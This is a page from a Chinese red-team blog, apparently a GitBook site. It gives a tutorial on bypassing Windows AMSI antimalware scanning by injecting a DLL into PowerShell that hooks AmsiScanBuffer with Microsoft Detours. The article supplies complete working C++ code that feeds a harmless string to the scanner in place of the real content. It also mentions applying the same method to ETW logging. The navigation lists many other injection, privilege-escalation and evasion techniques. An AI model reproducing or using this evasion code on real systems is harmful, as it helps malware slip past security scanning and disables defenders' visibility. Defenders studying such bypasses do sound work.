idiotc4t's blog
搜索文档…
idiotc4t's blog
关于这个博客
武器设计
我也不知道能不能写
C2手稿
先占个位置
武器化
COM组件相关的武器化开发技术
攻击demo的bof改造
Go项目反射改造
VulnBins的利用 (vuln driver)
红队研究
NtQueryInformationProcess逆向
NetUserAdd逆向
应急响应
WannaMine4.0专杀的一些技巧
防御逃避
ReflectiveDLLInjection变形应用
Execute-Assembly实现
ShadowMove复现与思考
载入第二个Ntdll绕Hook
编译时混淆字符串&函数调用
基于线程结束的EventLog绕过
动态获取系统调用(syscall)号
基于内存补丁的AMSI绕过
基于API Hook和DLL注入的AMSI绕过
基于内存补丁ETW的绕过
基于断链的DLL隐藏
基于HEX字符串执行的AV绕过
CobaltStrike Argue命令实现
简单的分离免杀
伪装PPID规避检测
伪装命令行规避检测
通过重写ring3 API函数实现免杀
动态调用无导入表编译
基于Registry的虚拟机检测
利用杀毒软件删除任意文件
反转字符串绕杀软
重新加载.text节拖钩
x64转换层&跨位数进程注入
代码与进程注入
Divide and Conquer
Clipboard Data Deliver
.NET Reflective Injection
APC Thread Hijack
CreateRemoteThread
APC Injection
Mapping Injection
Bypass Session 0 Injection
WhiteFile Offset Table Generate Shellcode
Early Bird
Early Bird & CreateRemoteThread
TLS Code Execute
SEH Code Execute
APC & NtTestAlert Code Execute
NtCreateSection & NtMapViewOfSection Code Execute
Process Hollowing
SetContext Hijack Thread
DLL Hollowing
权限提升
基于注册表劫持BypassUAC
基于dll劫持BypassUac
通过com组件BypassUAC
通过复制Token提权到SYSTEM
通过code&dll注入提权到SYSTEM
通过伪装PPID提权到SYSTEM
通过系统服务提权到SYSTEM
权限维持
主机特征绑定木马
寻找有价值的文件
获取机器安装的软件
通过API添加Windows用户
Detours InLine Hook
DLL劫持
RID劫持
自启动服务
编写简单远控
注册表自启动项
GitBook 提供支持
基于API Hook和DLL注入的AMSI绕过

简介

前面我们有详细的介绍过AMSI的原理和基于内存补丁的绕过方法,这次我们介绍一种略微复杂的方法,同时这种方法也可以应用于各种场景,前面我们有介绍过通过微软开源库Detours的inLineHook和进程注入的dll注入,这次我们把这两种技术做一个组合,来实现amsi的绕过,同样的思路也可以对 EtwEventWrite进行修补,使其丧失记录日志能力。

流程

  1. 1.
    编写一个hook AmsiScanBuffer的dll
  2. 2.
    使用dll注入进powershell进程
  3. 3.
    完成绕过

代码

dll注入的代码延用CreateRemoteThrea的代码。
1
#include <Windows.h>
2
#include <stdio.h>
3
#include <amsi.h>
4
#include "include/detours.h"
5
#pragma comment(lib, "amsi.lib")
6
#pragma comment(lib,"lib.X64/detours.lib")
7
8
#define SafeString "SafeString"
9
10
static HRESULT(WINAPI* _AmsiScanBuffer)(
11
HAMSICONTEXT amsiContext,
12
PVOID buffer,
13
ULONG length,
14
LPCWSTR contentName,
15
HAMSISESSION amsiSession,
16
AMSI_RESULT* result
17
) = AmsiScanBuffer;
18
19
HRESULT WINAPI AmsiScanBuffer_(
20
HAMSICONTEXT amsiContext,
21
PVOID buffer,
22
ULONG length,
23
LPCWSTR contentName,
24
HAMSISESSION amsiSession,
25
AMSI_RESULT* result
26
)
27
{
28
return _AmsiScanBuffer(amsiContext, (BYTE*)SafeString, length, contentName, amsiSession, result);
29
}
30
31
32
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
33
{
34
if (DetourIsHelperProcess()) {
35
return TRUE;
36
}
37
switch (ul_reason_for_call)
38
{
39
case DLL_PROCESS_ATTACH:
40
DetourTransactionBegin();
41
DetourUpdateThread(GetCurrentThread());
42
DetourAttach(&(PVOID&)_AmsiScanBuffer, AmsiScanBuffer_);
43
DetourTransactionCommit();
44
printf("hook ok\n");
45
break;
46
case DLL_THREAD_ATTACH:
47
break;
48
case DLL_THREAD_DETACH:
49
break;
50
case DLL_PROCESS_DETACH:
51
DetourTransactionBegin();
52
DetourUpdateThread(GetCurrentThread());
53
DetourDetach(&(PVOID&)_AmsiScanBuffer, AmsiScanBuffer_);
54
DetourTransactionCommit();
55
break;
56
}
57
return TRUE;
58
59
}
Copied!

LINKS

Understanding and Bypassing AMSI
x64Sec
防御逃避 - 以前
基于内存补丁的AMSI绕过
下一个 - 防御逃避
基于内存补丁ETW的绕过
最近更新 1yr ago
复制链接
内容
简介
流程
代码
LINKS